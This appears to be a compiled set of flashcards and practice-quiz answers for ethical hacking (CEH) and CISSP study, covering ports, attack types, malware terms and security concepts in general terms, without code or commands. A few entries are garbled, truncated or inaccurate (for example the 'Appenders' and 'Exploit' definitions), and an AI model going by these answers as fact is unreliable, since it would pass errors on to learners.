ethical hacking quizzes, CEH ch4, CEH ch5, CEH ch6, CH 4-6 Practice Test, CEH CH 5: Key Terms, Midterm study 2, CISSP Vocabulary
You are about to target a Linux server and would like to attempt access to the passwords. Which of the following folders is where you would find them
/ETC
During enumeration, what port may specifically indicate a portmapper on a Linux computer?
111
During enumeration, what port may specifically indicate portmapper on a Linux computer?
111
Which of the following is not an example of Martian packets?
126.0.0.0
Which of the following matches the common padding found on the end of short Windows LanMan (LM) passwords?
1404EE
How many steps are in the ARP process?
2
Which port on a Microsoft system gives you access to the LDAP service?
389
During enumeration, what port may specifically indicate a Windows computer and most likely not a Linux computer?
445
During enumeration, what port may specifically indicate a Windows computer?
445
Smurf attack
A DDoS attack where an attacker transmits large amounts of ICMP echo request (ping) packets to a targeted IP destination device using the targeted destination's IP source address. This is called spoofing the IP source address. IP routers and other IP devices that respond to broadcasts will respond back to the targeted IP device with ICMP echo replies, thus multiplying the amount of bogus traffic.
SYN flood attack
A DDoS attack where the attacker sends a succession of SYN packets with a spoof address to a targeted destination IP device, but does not send the last ACK packet to acknowledge and confirm receipt. This leaves half-open connections between the client and the server until all resources are absorbed, rendering the server or targeted IP destination device unavailable because of resource allocation to this attack.
Information technology security evaluation criteria (ITSEC)
A European standard that was developed in the 1980s to evaluate confidentiality, integrity, and availability of an entire system.
Bus LAN configuration
A LAN network design that was developed to connect computers used for 10BASE-5 and 10BASE-2 computer networks. All computers and devices are connected along a common bus or single communication line so that transmissions by one device are received by all.
Bridge
A Layer 2 device for passing signals between two LANs or two segments of a LAN.
You have configured a standalone computer to analyze malware. It has port monitors, file monitors, and virtualization installed, and it has no network connectivity. What is this system called?
A SHEEP DIP COMPUTER
Dropper
A Trojan horse or program designed to drop a virus to the infected computer and then execute it.
dropper
A Trojan horse or program designed to drop a virus to the infected computer and then execute it.
Trojan
A Trojan is a program that does something undocumented that the programmer or designer intended, but that the end user would not approve of if he knew about it.
Terminal Access Controller Access Control System (TACACS)
A UDPbased access control protocol that provides authentication, authorization, and accountability.
Uniform resource locator (URL)
A URL is the global address on the Internet and World Wide Web where domain names are used to resolve IP addresses.
Back orifice
A backdoor program that trojans the end user and gives the attacker the ability to remote control the system.
double-blind test
A blind test in which the organization's security team does not know that an attack is coming. Only a few individuals at the organization know about the attack, and they do not share this information with the security team. This test usually requires equal effort for both the testing team and the organization's security team.
Packet or packet data unit (PDU)
A block of data sent over the network that transmits the identities of the sending and receiving stations, for error control.
Enterprise architecture
A blueprint that defines the business structure and operation of the organization.
Administrative law
A body of regulations, rules, orders, and decisions to carry out regulatory powers, created by administrative agencies.
Coaxial cable
A cable composed of an insulated central conducting wire wrapped in another cylindrical conductor (the shield). The whole thing is usually wrapped in another insulating layer and an outer protective layer. A coaxial cable has great capacity to carry vast quantities of information. It is typically used in high-speed data and CATV applications.
Catastrophe
A calamity or misfortune that causes the destruction of facility and data.
Data dictionary
A catalog of all data held in a database, or a list of items giving data names and structures.
Application controls
A category of controls used to verify the accuracy and completeness of records made by manual or automated processes. Controls used for applications include encryption, batch totals, and data input validation.
Repository
A central place where data is stored and maintained. A repository can be a place where multiple databases or files are located for distribution over a network, or it can be a location that is directly accessible to the user without having to travel across a network.
Virus hoax
A chain letter designed to trick you into forwarding to many other people warning of a virus that does not exist. The Good Times virus is an example.
Remote Authentication Dial-In User Service (RADIUS)
A client/server protocol and software that allows remote-access servers to communicate. Used in wireless systems such as 802.1x.
Hypertext Markup Language (HTML)
A coding technique used to create documents and web pages for the World Wide Web.
Record
A collection of data items or fields treated as one unit.
Database
A collection of data that is organized and stored on a computer and can be searched and retrieved by a computer program.
Transmission Control Protocol/Internet Protocol (TCP/IP)
A collection of protocols used to provide the basis for Internet and World Wide Web services.
Security kernel
A combination of software, hardware, and firmware that makes up the Trusted Computer Base (TCB). The TCB mediates all access, must be verifiable as correct, and is protected from modification.
Indexed sequential access method (ISAM)
A combination or compromise between indexed blocks of data arranged sequentially within each block; used for storing data for fast retrieval.
Bus
A common shared channel among multiple computer devices.
Post office protocol (POP)
A commonly implemented method of delivering email from the mail server to the client machine. Other methods include IMAP and Microsoft Exchange.
Business impact analysis (BIA)
A component of the business continuity plan. The BIA looks at all the components that an organization relies on for continued functionality. It seeks to distinguish which are more crucial than others and require a greater allocation of funds in the wake of a disaster.
Firmware
A computer program or software stored permanently in PROM or ROM, or semipermanently in EPROM. Software is "burned in" on the memory device so that it is nonvolatile (will not be lost when power is shut off)
Compiler
A computer program that translates a computer program written in one computer language (called the source language) into an equivalent program written in another computer language (called the object, output, or target language).
virus
A computer program with the capability to generate copies of itself and thereby spread. Viruses require the interaction of an individual to activate and can have rather benign results, such as flashing a message to the screen, or rather malicious results that destroy data, systems, integrity, or availability.
Virus
A computer program with the capability to generate copies of itself and thereby spread. Viruses usually require the interaction of an individual and can have rather benign results, such as flashing a message to the screen, or rather malicious results that destroy data, systems, integrity, or availability.
Dumb terminal
A computer workstation or terminal that consists of a keyboard and screen, but with no processor of its own. It sends and receives its data to and from a large central computer or server.
User datagram protocol (UDP)
A connectionless protocol that provides very few error recovery services, but offers a quick and direct way to send and receive datagrams.
Baseline
A consistent or established base used to establish a minimum acceptable level of security.
Outsourcing
A contract arrangement between a third party and the organization for services such as web hosting, application development, or data processing.
Service level agreement (SLA)
A contractual agreement between an organization and its service provider. SLAs define and protect the organization in regard to holding the service provider accountable for the requirements as defined in the agreement.
Time-to-live (TTL)
A counter used within an IP packet that specifies the maximum number of hops that a packet can traverse. When a TTL is decremented to zero, a packet expires.
Steganography
A cryptographic method of hiding the existence of a message. A commonly used form places information in pictures.
Hash
A cryptographic sum considered a one-way value. A hash is considerably shorter than the original text and can be used to uniquely identify it. You might have seen a hash value next to applications available for download on the Internet. By comparing the hash of the application with the one on the application vendor's website, you can make sure that the file has not been changed or altered. MD5 and SHA-1 are examples of hashing algorithms.
Packet switching
A data transmission method that divides messages into standard-sized packets for greater efficiency in routing and transporting them through a network.
Hierarchical database
A database organized in a tree structure, in which each record has one owner. Navigation to individual records takes place through predetermined access paths.
Last in first out (LIFO)
A dataprocessing method that applies to buffers. The last item in the buffer is the first to be removed.
Risk avoidance
A decision to take action to avoid a risk.
Procedure
A detailed, in-depth, step-by-step document that lays out exactly what is to be done and how it is to be accomplished.
Uninterruptible power supply (UPS)
A device designed to provide a backup power supply during a power failure. Basically, a UPS is a battery backup system with an ultra-fast sensing device.
Gateway
A device that allows for the translation and management of communication between networks that use different protocols or designs. Can also be deployed in a security context to control sensitive traffic.
Router
A device that determines the next network point to which a data packet should be forwarded enroute toward its destination. The router is connected to at least two networks and determines which way to send each data packet based on its current understanding of the state of the networks it is connected to. Routers create or maintain a table of the available routes and use this information to determine the best route for a given data packet. Routing occurs at Layer 3 (network layer) of the OSI seven-layer model.
Arithmetic logic unit (ALU)
A device used for logical and arithmetic operations within a computer.
Hub
A device used for physical connectivity in networks. It provides connectivity, amplification, and signal regeneration.
Certificate
A digital certificate is a file that uniquely identifies its owner. A certificate contains owner identity information and its owner's public key. Certificates are created by the certificate authority.
Business case
A document developed to establish the merits and desirability of a project. This is the information necessary to enable.
IT security architecture and framework
A document that defines the policies, standards, procedures, and guidelines for information security.
Single loss expectancy (SLE)
A dollar value figure that represents an organization's loss from a single loss or loss of this particular IT asset.
fuzz testing
A dynamic testing tool that provides input to the software to test the software's limits and discover flaws. The input provided can be randomly generated by the tool or specially created to test for known vulnerabilities.
Password authentication protocol (PAP)
A form of authentication in which clear text usernames and passwords are passed.
Hardware keystroke logger
A form of key logger that is a hardware device. When placed in the system it is hard to detect without a physical inspection. It may be plugged into the keyboard connector or can be built into the keyboard.
Packet filter
A form of stateless inspection performed by some firewalls and routers.
Infrastructure mode
A form of wireless networking in which wireless stations communicate with each other by first going through an access point.
Bell-LaPadula
A formal model based on confidentiality. It is defined by two basic properties: . Simple Security Property (ss Property)-This property states that a subject at one level of confidentiality is not allowed to read information at a higher level of confidentiality. It is sometimes referred to as "no read up." . Star * Security Property-This property states that a subject at one level of confidentiality is not allowed to write information to a lower level of confidentiality. Also known as "no write down."
Annualized loss expectancy (ALE)
A formula used to calculate a quantifiable measurement of the impact that a threat will have on an organization if it occurs. ALE is used to calculate the possible loss that could occur over a one-year period. The formula is SLE * ARO = ALE.
Heuristic scanning
A from of virus scanning that looks at irregular activity by programs. As an example a heuristic scanner would flag a word processing program that attempted to format the hard drive as that is not normal activity.
Hot site
A fully prepared and configured site that is ready for use.
IT infrastructure
A general term to encompass all information technology assets (hardware, software, data), components, systems, applications, and resources.
Red team
A group of ethical hackers who help organizations to explore network and system vulnerabilities by means of penetration testing.
Local area network (LAN)
A group of wired or wireless computers and associated devices that share a common communications line and typically share the resources of a single processor or server within a small geographic area (for example, within an office building).
NIST SP 800-92
A guide to computer security log management.
NIST SP 800-137
A guide to information security continuous monitoring (ISCM) for federal information systems and organizations.
Email bomb
A hacker technique that floods the email account of the victim with useless emails.
Personal digital assistant (PDA)
A handheld device that combines computing, telephone/fax, and networking features. A typical PDA can function as a cellular phone, fax sender, and personal organizer. Many PDAs incorporate handwriting and/ or voice-recognition features. PDAs also are called palmtops, handheld computers, and pocket computers.
Paper shredder
A hardware device used for destroying paper and documents by shredding to prevent dumpster diving.
Sniffers
A hardware or software device that can be used to intercept and decode network traffic
Sniffer
A hardware or software device that can be used to intercept and decode network traffic.
MD5
A hashing algorithm that produces a 128-bit output.
SHA-1
A hashing algorithm that produces a 160-bit output.
Bollard
A heavy round post used to prevent automobiles from ramming buildings or breaching physical security.
Domain name system (DNS)
A hierarchy of Internet servers that translate alphanumeric domain names into IP addresses and vice versa. Because domain names are alphanumeric, it's easier to remember these names than IP addresses.
File server
A high-capacity disk storage device or a computer that each computer on a network can use or access and retrieve files that can be shared among attached computers. Such computer programs can be set up to accept (or not accept) different programs running on other computers, to access the files of that computer.
Policy
A high-level document that dictates management intentions toward security.
Storage area network (SAN)
A high-speed subnetwork that interconnects different data-storage devices with associated data servers for a large network. SANs support disk mirroring, backup and restore, archival and retrieval of archived data, data migration from one storage device to another, and the sharing of data among different servers in a network.
Intrusion detection
A key component of security that includes prevention, detection, and response. It is used to detect anomalies or known patterns of attack.
Massive array of inactive disks (MAID)
A large array of hard drives that are kept inactive until needed.
Question 29 : Why is a SYN flood attack detectablE?
A large number of SYN packets will appear on the network without the corresponding reply.
Internet engineering task force (IETF)
A large open, international community of network designers, operators, vendors, and researchers concerned with the evolution of the Internet architecture and the smooth operation of the Internet. It is open to any interested individual. The IETF is the protocol-engineering and development arm of the Internet.
Lattice-based access control (LBAC)
A lattice-based access-control model was developed to deal with confidentiality and integrity. It places an upper and lower boundary on subjects and objects.
Civil law
A law that usually pertains to the settlement of disputes between individuals, organizations, or groups, and having to do with the establishment, recovery, or redress of private and civil rights. Civil law is not criminal law. It is also called tort law and is mainly for redress or recovery related to wrongdoing.
Combination lock
A lock that can be opened by turning dials in a predetermined sequence.
Data structure
A logical relationship among data elements that is designed to support specific data-manipulation functions.
Frame
A logical structure in which data can be placed
Which of the following is best when selecting a biometric system?
A low crossover error rate
Algorithm
A mathematical procedure used for solving a problem. Commonly used by in cryptography.
Mandatory access control (MAC)
A means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (such as clearance) of subjects to access information of such sensitivity.
Compact disc (CD)
A means of storing video, audio, and data on an optical disk. CDs were originally designed for digital audio music.
Fiber-optic cable
A medium for transmission comprised of many glass fibers. Light-emitting diodes or lasers send light through the fiber to a detector that converts the light back to an electrical signal for interpretation. Advantages include huge bandwidth, immunity to electromagnetic interference, and the capability to traverse long distances with minimal signal degradation.
Security bulletin
A memorandum or message from a software vendor or manufacturer documenting a known security defect in the software or application itself. Security bulletins are typically accompanied with instructions for loading a software patch to mitigate the security defect or software vulnerability.
Cookies
A message from a website given to an individual's web browser on the workstation device. The workstation browser stores this text message in a text file. The message is sent back to the web server each time that the browser goes to that website.
System development life cycle (SDLC)
A method for developing information systems. It has five main stages: analysis, design, development, implementation, and evaluation. Each stage has several components; for example, the development stage includes programming Transmission Control Protocol/Internet Protocol (TCP/IP) (coding, including internal documentation, debugging, testing, and documenting) and acquiring equipment (selection, acquisition [purchase or lease], and testing).
Extensible authentication protocol (EAP)
A method of authentication that can support multiple authentication methods such as tokens, smart cards, certificates, and one-time passwords.
Brute-force attack
A method of breaking a cipher or encrypted value by trying a large number of possibilities. Brute-force attacks function by working through all possible values. The feasibility of brute-force attacks depends on the key length and strength of the cipher and the processing power available to the attacker.
Synchronous transmission
A method of communication in which data is sent in blocks, without the need for start and stop bits between each byte. Synchronization is achieved by sending a clock signal along with the data and by sending special bit patterns to denote the start of each block.
Rounding down
A method of computer fraud that involves rounding down dollar amounts so that small amounts of money are stolen. As an example, the value $1,199.50 might be rounded down to $1,199.00.
Network address translation (NAT)
A method of connecting multiple computers to the Internet using one IP address so that many private addresses are being converted to a single public address.
MAC filtering
A method of controlling access on a wired or wireless network by denying access to an device that their MAC address does not match one that is on a pre-approved list.
First in First out (FIFO)
A method of data and information storage in which the data stored for the longest time will be retrieved first.
Penetration test
A method of evaluating the security of a network or computer system by simulating an attack by a malicious hacker but without doing harm and with the owner's consent.
Piggybacking
A method of gaining unauthorized access into a facility by following an authorized employee through a controlled access point or door.
TEMPEST
A method of shielding equipment to prevent the capability of capturing and using stray electronic signals and reconstructing them into useful intelligence.
Biometrics
A method of verifying a person's identify for authentication by analyzing a unique physical attribute of the individual such as a fingerprint, retinal scanning or palm print.
Authentication
A method that enables you to identify someone. Authentication verifies the identity and legitimacy of the individual to access the system and its resources. Common authentication methods include passwords, tokens, and biometric systems.
Pattern matching
A method used by IDS systems to identify malicious traffic. It is also called signature matching and works by matching traffic against signatures stored in a database.
Vulnerability assessment
A methodical evaluation of an organization's IT weaknesses of infrastructure components and assets and how those weaknesses can be mitigated through proper security controls and recommendations to remediate exposure to risks, threats, and vulnerabilities.
Quantitative risk assessment
A methodical, step-by-step calculation of asset valuation, exposure to threats, and the financial impact or loss in the event of the threat being realized.
Parallel testing
A mode of testing in which a stream of data is fed into two systems to allow processing by both so that the results can be compared.
Disaster
A natural or man-made event that can include fire, flood, storm, and equipment failure that negatively affects an industry or facility.
Repeater
A network device used to regenerate or replicate a signal. Repeaters are used in transmission systems to regenerate analog or digital signals distorted by transmission loss.
Intrusion Detection System
A network monitoring device usually installed at Internet ingress/egress points used to inspect inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break in to or compromise a system
Ethernet
A network protocol defining a specific implementation of the physical and data link layers in the OSI model (IEEE 802.3). Ethernet is a local area network that uses a bus topology and provides reliable highspeed communications (maximum of 100 million bps) in a limited geographic area (such as an office complex or university complex).
Intrusion detection system (IDS)
A network-monitoring device typically installed at Internet ingress/egress points used to inspect inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break into or compromise a system.
Source code
A nonexecutable program written in a high-level language. A compiler or assembler must translate the source code into an object code (machine language) that the computer can understand.
Decision support system (DSS)
A now-superseded term for a software application that analyzes business data and presents it so that users can make business decisions more easily.
Initial sequence number
A number defined during a TCP startup session.
Quantitative analysis
A numerical evaluation and analysis based on monetary or dollar valuation as part of the evaluation or analysis.
Turnstile
A one-way gate or access control mechanism used to limit traffic and control the flow of people.
Passive (OS) fingerprint
A passive method of identifying the OS of a targeted computer or device. No traffic or packets are injected into the network attackers simply listen to and analyze existing traffic.
Database administrator (DBA)
A person (or group of people) responsible for the maintenance activities of a database, including backup and recovery, performance, and design.
Feasibility study
A phase of an SDLC methodology that researches the feasibility and adequacy of resources for the development or acquisition of a system solution for a user's need.
Backdoor
A piece of software that allows access to a computer without using the conventional security procedures. Backdoors are often associated with Trojans.
backdoor
A piece of software that allows access to a computer without using the conventional security procedures. Backdoors are often associated with Trojans.
Program evaluation and review technique (PERT)
A planning and control tool representing, in diagram form, the network of tasks required to complete a project, establishing sequential dependencies and relationships among the tasks.
Acceptable use policy (AUP)
A policy that defines what employees, contractors, and third parties are authorized to do on the organization's IT infrastructure and its assets. AUPs are common for access to IT resources, systems, applications, Internet access, email access, and so on.
IANA
A primary governing body for Internet networking. IANA oversees three key aspects of the Internet: top-level domains (TLDs), IP address allocation, and port number assignments. IANA is tasked with preserving the central coordinating functions of the Internet for the public.
Extranet
A private network that uses Internet protocols and the public telecommunication system to securely share part of a business's information or operations with suppliers, vendors, partners, customers, or other businesses. An extranet can be viewed as part of a company's intranet extended to users outside the company. An extranet requires security and privacy.
Virtual private network (VPN)
A private network that uses a public network to connect remote sites and users.
Risk assessment
A process for evaluating the exposure or potential loss or damage to the IT and data assets for an organization.
Principle of deny all
A process of securing logical or physical assets by first denying all access and then allowing access only on a case-by case basis.
trojan
A program disguised as legitimate software but designed to covertly do something malicious or nefarious.
Assembler
A program that converts the assembly language of a computer program into the machine language of the computer.
information security continuous monitoring (ISCM)
A program that involves maintaining ongoing awareness of information security, vulnerabilities, and threats to support organizational risk management decisions.
Key exchange protocol
A protocol used to exchange secret keys for the facilitation of encrypted communication. Diffie-Hellman is an example of a key exchange protocol.
Downtime report
A record that tracks the amount of time that a computer or device is not operating because of a hardware or software failure.
log
A recording of events that occur on an organizational asset, including systems, networks, devices, and facilities. Each entry in a log covers a single event that occurs on the asset.
Exception report
A report that uses data selection based on a very specific set of circumstances to identify process exceptions. Reports that identify items with negative on-hand quantities or locations with more than one item stored in them are examples of exception reports.
Asymmetric algorithm
A routine that uses a pair of different but related cryptographic keys to encrypt and decrypt data.
Open shortest path first (OSPF)
A routing protocol that determines the best path for routing IP traffic over a TCP/IP network. It uses less router-to-router update traffic than the RIP protocol that it has been designed to replace.
Qualitative risk assessment
A scenario-based assessment in which one scenario is examined and assessed for each critical or major threat to an IT asset.
Challenge handshake authentication protocol (CHAP)
A secure method for connecting to a system. CHAP functions as follows: 1. After the authentication request is made, the server sends a challenge message to the requestor. The requestor responds with a value obtained by using a one-way hash. 2. The server then checks the response by comparing the received hash to one calculated locally by the server. 3. If the values match, the authentication is acknowledged; otherwise, the connection is terminated.
White box
A security assessment of penetration test in which all aspects of the network are known
White box testing
A security assessment of penetration test in which all aspects of the network are known.
Required vacations
A security control used to uncover misuse or illegal activity by requiring employees to use their vacation.
Security countermeasure
A security hardware or software technology solution that is deployed to ensure the confidentiality, integrity, and availability of IT assets that need protection.
Rotation of assignment
A security mechanism that moves employees from one job to another so that one person does not stay in one position forever. This makes it harder for an employee to hide malicious activity.
Ethical hacker
A security professional who legally attempts to break into a computer system or network to find its vulnerabilities.
Wi-Fi protected access (WPA)
A security standard for wireless networks designed to be more secure than WEP. Developed from the draft 802.11i standard.
Worm
A self-replicating program that spreads by inserting copies of itself into other executable codes, programs, or documents. Worms typically flood a network with traffic and result in a denial of service.
worm
A self-replicating program that spreads by inserting copies of itself into other executable codes, programs, or documents. Worms typically flood a network with traffic and result in a denial of service.
Binary code
A sequence of 0s and 1s used by computer systems as the bases of communication.
Encryption key
A sequence of characters used by an encryption algorithm to encrypt plain text into cipher text.
Radio frequency identification (RFID)
A set of components that include a reader and a small device referred to as a tag. The tag can be used to hold information for inventory, management, tracking, or other purposes. RFID provides a method to transmit and receive data over a short range from one point to another.
Methodology
A set of documented procedures used for performing activities in a consistent, accountable, and repeatable manner.
Protocol
A set of formalized rules that describe how data is transmitted over a network. Low-level protocols define the electrical and physical standard, whereas high-level protocols deal with formatting of data. TCP and IP are examples of high-level LAN protocols.
Audit trail
A set of records that collectively provide documentary evidence of processing used to aid in tracing from original transactions forward to related records and reports, and/or backward from records and reports to their component source transactions.
Application programming interface (API)
A set of system-level routines that can be used in an application program for tasks such as basic input/output and file management. In a graphics-oriented operating environment such as Microsoft Windows, high-level support for video graphics output is part of the Windows graphical API.
Applet
A small Java program that can be embedded in an HTML page. Applets differ from full-fledged Java applications in that they are not allowed to access certain resources on the local computer, such as files and serial devices (modems, printers, and so on), and are prohibited from communicating with most other computers across a network. The current rule is that an applet can make an Internet connection only to the computer from which the applet was sent.
tini
A small Trojan program that listens on port 777.
Application
A software program designed to perform a specific task or group of tasks, such as word processing, communications, or database management.
Universal serial bus (USB)
A specification standard for connecting peripherals to a computer. It can connect up to 127 devices to a computer and transfers data at a slower rate, a maximum of 12Mbps.
American standard code for information interchange (ASCII)
A standard code for transmitting data, consisting of 128 letters, numerals, symbols, and special codes, each of which is represented by a unique binary number. An ASCII word typically is 8 bits of binary data.
Utility programs
A standard set of routines that assist in the operation of a computer system by performing some frequently required process, such as copying, sorting, or merging.
Benchmark
A standard test or measurement compares the performance of similar components or systems.
Software vulnerability standard
A standard that accompanies an organization's vulnerability assessment and management policy. This standard typically defines the organization's vulnerability window definition and how the organization is to provide software vulnerability management and software patch management throughout the enterprise.
Off-site storage
A storage facility that is not located at the organization's primary facility. The idea behind off-site storage is to protect information and damage that might occur at the primary facility. Off-site storage facilities are used to store computer media, backup data, and files.
Message switching
A strategy that enables communication channels to be used simultaneously by more than one node. At each transfer point in the connection, incoming data is stored in its entirety and then forwarded to the next point. This process continues until the data reaches its destination.
Capability maturity model (CMM)
A structured model designed by Carnegie Mellon's Software Engineering Institute to improve and optimize the software development life cycle.
Impact assessment
A study of the potential future effects of a development project on current projects and resources. The resulting document should list the pros and cons of pursuing a specific course of action.
Help desk
A support system designed to assist end users with technical and functional questions and problems. Also serves as technical support for hardware and software. Help desks are staffed by people who can either solve the problem directly or forward the problem to someone else. Help desk software provides the means to log problems and track them until solved. It also gives management information regarding support activities.
Electronic code book (ECB)
A symmetric block cipher that is a form of DES. ECB is considered the weakest from of DES. When used, the same plain-text input results in the same encrypted text output.
Blowfish
A symmetric block encryption designed in 1993.
Rijndael
A symmetric encryption algorithm chosen to be the Advanced Encryption Standard (AES).
Data encryption standard (DES)
A symmetric encryption standard based on a 64-bit block. DES processes 64 bits of plain text at a time to output 64-bit blocks of cipher text. DES uses a 56-bit key and has four modes of operation. Because DES has been broken, 3DES is more commonly used.
Nonrepudiation
A system or method put in place to ensure that an individual cannot deny his own actions.
Business continuity planning (BCP)
A system or methodology to create a plan for how an organization will resume partially or completely interrupted critical functions within a predetermined time after a disaster or disruption occurs. The goal is to keep critical functions operational.
Closed system
A system that is not "open" and, therefore, is a proprietary system. Open systems are those that employ modular designs, are widely supported, and facilitate multi-vendor, multi-technology integration.
Integrated services digital network (ISDN)
A system that provides simultaneous voice and high-speed data transmission through a single channel to the user's premises. ISDN is an international standard for end-to-end digital transmission of voice, data, and signaling.
File allocation table (FAT)
A table or list maintained by an operating system to keep track of the status of various segments of disk used for file storage.
Certification
A technical evaluation of the system that can be carried out by independent security teams or or the existing staff
Digital watermark
A technique that adds hidden copyright information to a document, picture or sound file.
Just a bunch of disks (JBOD)
A technique that is somewhat like RAID in that two or more hard drives are combined into one storage array. However, JBOD offers none of the fault tolerance advantages of RAID.
Bayesian filter
A technique used to detect spam. Bayesian filters give a score to each message based on the words and numbers in a message. They are often employed by antispam software to filter spam based on probabilities. Messages with high scores are flagged as spam and can be discarded, deleted, or placed in a folder for review.
Kilo lines of code (KLOC)
A technique used to determine the cost of software development based solely on the length of code.
Internet packet spoofing (IP spoofing)
A technique used to gain unauthorized access to computers or in denial or service attacks. Newer routers and firewall arrangements can offer protection against IP spoofing.
Direct-sequence spread spectrum (DSSS)
A technique used to scramble the signal of wireless devices.
Tunneling
A technology that enables one network to send its data via another network's connections. Tunneling works by encapsulating a network protocol within packets carried by the second network. For example, Microsoft's PPTP technology enables organizations to use the Internet to transmit data across a VPN. It does this by embedding its own network protocol within the TCP/IP packets carried by the Internet. Tunneling is also called encapsulation. Can also be used covertly, as with STUNNEL and other programs.
Channel service unit/digital service unit (CSU/DSU)
A telecommunications device used to terminate telephone company equipment, such as a T1, and prepare data for router interface at the customer's premises.
Cracker
A term derived from "criminal hacker," someone who acts in an illegal manner.
Audit
A term that typically accompanies an accounting or auditing firm that conforms to a specific and formal methodology and definition for how an investigation is to be conducted with specific reporting elements and metrics being examined (such as a financial audit according to Public Accounting and Auditing Guidelines and Procedures).
Ethical hack
A term used to describe a type of hack done to help a company or individual identify potential threats on the organizations IT infrastructure or network. Ethical hackers must obey rules or engagement, do no harm, and stay within legal boundaries.
Botnet
A term used to describe robot-controlled workstations that are part of a collection of other robot-controlled workstations.
target test
A test in which both the testing team and the organization's security team are given maximum information about the network and the type of test that will occur. This is the easiest test to complete but does not provide a full picture of the organization's security.
full-knowledge test
A test in which the testing team is provided with all available knowledge regarding the organization's network. This test is focused more on what attacks can be carried out.
blind test
A test in which the testing team is provided with limited knowledge of the network systems and devices using publicly available information. The organization's security team knows that an attack is coming. This test requires more effort by the testing team, and the testing team must simulate an actual attack.
zero-knowledge test
A test in which the testing team is provided with no knowledge regarding the organization's network. The testing team can use any means available to obtain information about the organization's network. This is also referred to as closed- or black-box testing.
partial-knowledge test
A test in which the testing team is provided with public knowledge regarding the organization's network. Boundaries might be set for this type of test.
penetration test
A test that simulates an attack to identify any risks that can stem from the vulnerabilities of a system or device.
Diskless workstation
A thin client that has no hard drive or local operating system. The system boots from a centralized server and stores files on a network file server.
TCP handshake
A three step process computers go through when negotiating a connection with one another; the process is a target of attackers and others with malicious intent
TCP handshake
A three-step process computers go through when negotiating a connection with one another. The process is a target of attackers and others with malicious intent.
keylogger (keystroke logger)
A tool that an attacker uses to capture user keystrokes in a system to steal sensitive data (including credentials). There are two main types of keyloggers: keylogging hardware devices and keylogging software. A hardware (physical) keylogger is usually a small device that can be placed between a user's keyboard and the main system. Software keyloggers are dedicated programs designed to track and log user keystrokes.
Ring topology
A topology used by token ring and FDDI networks in which all devices are connected in a ring. Data packets in a ring topology are sent in a deterministic fashion from sender and receiver to the next device in the ring.
Mantrap
A turnstile or other gated apparatus used to detain an individual between a trusted state and an untrusted state for authentication.
Man-in-the-middle attack
A type of attack in which the attacker can read, insert, and change information being passed between two parties without either party knowing that the information has been compromised.
Macro infector
A type of computer virus that infects macro files. I Love You and Melissa are both examples of macro viruses.
Dictionary attack
A type of cryptographic attack in which the attacker uses a word list or dictionary list to try to crack an encrypted password. A newer technique is to use a time/memory trade-off such as in rainbow tables.
Paper test
A type of disaster recovery test that reviews the steps of the test without actually performing the steps. This type of disaster recovery test is normally used to help team members review the proposed plan and become familiar with the test and its objectives.
Role-based access control (RBAC)
A type of discretionary access control in which users are placed into groups to facilitate management. This type of access control is widely used by banks and casinos.
RAID
A type of fault tolerance and performance improvement for disk drives that employ two or more drivers in combination; Redundant array of independent disks
Redundant Array of Independent Disks (RAID)
A type of fault tolerance and performance improvement for disk drives that employ two or more drives in combination.
Anomaly detection
A type of intrusion detection that looks at behaviors that are not normal with standard activity. These unusually patterns are identified as suspicious.
ransomware
A type of malware that encrypts all files until a payment is made.
Rule-based access control (RBAC)
A type of mandatory access control that matches objects to subjects. It dynamically assigns roles to subjects based on their attributes and a set of rules defined by a security policy.
real user monitoring (RUM)
A type of passive monitoring that captures and analyzes every transaction of every application or website user.
synthetic transaction monitoring
A type of proactive monitoring often preferred for websites and applications. It provides insight into the availability and performance of an application and warns of any potential issue before users experience any degradation in application behavior.
Wrapper
A type of program used to bind a Trojan program to a legitimate program. The objective is to trick the user into running the wrapped program and installing the Trojan.
wrapper
A type of program used to bind a Trojan program to a legitimate program. The objective is to trick the user into running the wrapped program and installing the Trojan.
misuse case testing
A type of testing that tests an application to ensure that the application can handle invalid input or unexpected behavior. Also known as negative testing.
Broadcast
A type of transmission used on local and wide area networks in which all devices are sent the information from one host.
File infector
A type of virus in which the copies itself into executable programs.
Fast infection
A type of virus infection that occurs quickly.
What is LSASS?
A user mode process that is responsible for the local system security policy
Exposure factor
A value calculated by determining the percentage of loss to a specific asset due to a specific threat.
Cryptographic key
A value used in the cryptographic process of encryption or decryption.
Appenders
A virus infection type that places the virus code at the end of the infected file. Asymmetric encryption.
Multipartite virus
A virus that attempts to attack both the boot sector and executable files.
Master boot record infector
A virus that infects a master boot record.
Polymorphic virus
A virus that is capable of change and self-mutation.
Prepender
A virus type that adds the virus code to the beginning of existing executables.
Exploit
A vulnerability in software or hardware that can be exploited by a hacker to gain access to a system or service.
Traceroute
A way of tracing hops or computers between the source and target computer you are trying to reach. Gives the path the packets are taking.
Qualitative analysis
A weighted factor or nonmonetary evaluation and analysis based on a weighting or criticality factor valuation as part of the evaluation or analysis.
Routing information protocol (RIP)
A widely used distance-vector protocol that determines the best route by hop count.
Broadband
A wired or wireless transmission medium capable of supporting a wide range of frequencies, typically from audio up to video frequencies. It can carry multiple signals by dividing the total capacity of the medium into multiple, independent bandwidth channels, with each channel operating on only a specific range of frequencies.
This type of security test usually takes on an adversarial role and looks to see what an outsider can access and control. a. Penetration test b. High-level evaluation c. Network evaluation d. Policy assessment
A. A penetration test can be described as an assessment in which the security tester takes on an adversarial role and looks to see what an outsider can access and control
Black hat Bob would like to redirect his co-worker's traffic to his computer so that he can monitor his co-worker's activities on the Internet. The local area network is fully switched and sits behind a NATing router and a firewall. Which of the following techniques would work best? a. ARP spoofing. b. Black hat Bob should configure his MAC address to be the same as that of the co-worker he would like to monitor. c. DNS spoofing. d. Black hat Bob should configure his IP address to be the same as the default gateway.
A. ARP spoofing is used to redirect traffic on a switched network.
You have just performed an ACK scan and have been monitoring a sniffer while the scan was performed. The sniffer captured the result of the scan as an ICMP type 3 code 13. What does this result mean? a. The firewall is only a router with an ACL. b. The port is open. c. Port knocking is used. d. The port is closed.
A. An ICMP type 3 code 13 is administratively filtered. This type of response is returned from a router when the protocol has been filtered by an ACL.
Which rule means that all ports and applications are turned off, and only the minimum number of applications and services needed to accomplish the organization's goals? a. Deny all b. Principle of least privilege c. Access control list d. Defense in depth
A. Deny all means that by default all ports and services are turned off; then only when a service or application is needed to accomplish a legitimate function of the organization is the service turned on.
